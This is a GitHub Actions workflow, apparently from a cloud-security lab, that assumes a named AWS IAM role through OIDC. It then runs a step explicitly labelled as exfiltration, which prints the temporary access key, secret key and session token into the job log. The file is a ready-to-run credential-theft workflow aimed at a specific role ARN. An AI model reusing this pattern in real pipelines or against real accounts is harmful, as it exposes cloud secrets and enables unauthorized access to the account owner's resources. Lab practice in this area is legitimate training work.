name: "Assume AWS Role via OIDC"

# Configure the workflow trigger (e.g., on a pull request targeting main)
on: workflow_dispatch

jobs:
  aws_assumption_job:
    runs-on: ubuntu-latest
    
    # REQUIRED: Set permissions to generate the OIDC ID Token
    permissions:
      id-token: write # Required to get the ID Token for OIDC permissions [1]
      contents: read # Needed for private repositories to checkout [1]

    steps:
      - name: Checkout Repository
        uses: actions/checkout@v3

      - name: Configure AWS Credentials using OIDC
        uses: aws-actions/configure-aws-credentials@v1
        with:
          aws-region: us-east-1
          role-to-assume: arn:aws:iam::337909758621:role/sts-lab-2-target
          role-session-name: OIDCSession

      - name: Verify Assumed Role Identity
        run: aws sts get-caller-identity
        shell: bash

      - name: Exfiltrate Assumed Role Credentials
        run: |
          echo "ACCESS_KEY_ID: $AWS_ACCESS_KEY_ID"
          echo "SECRET_ACCESS_KEY: $AWS_SECRET_ACCESS_KEY"
          echo "SESSION_TOKEN: $AWS_SESSION_TOKEN"
        shell: bash
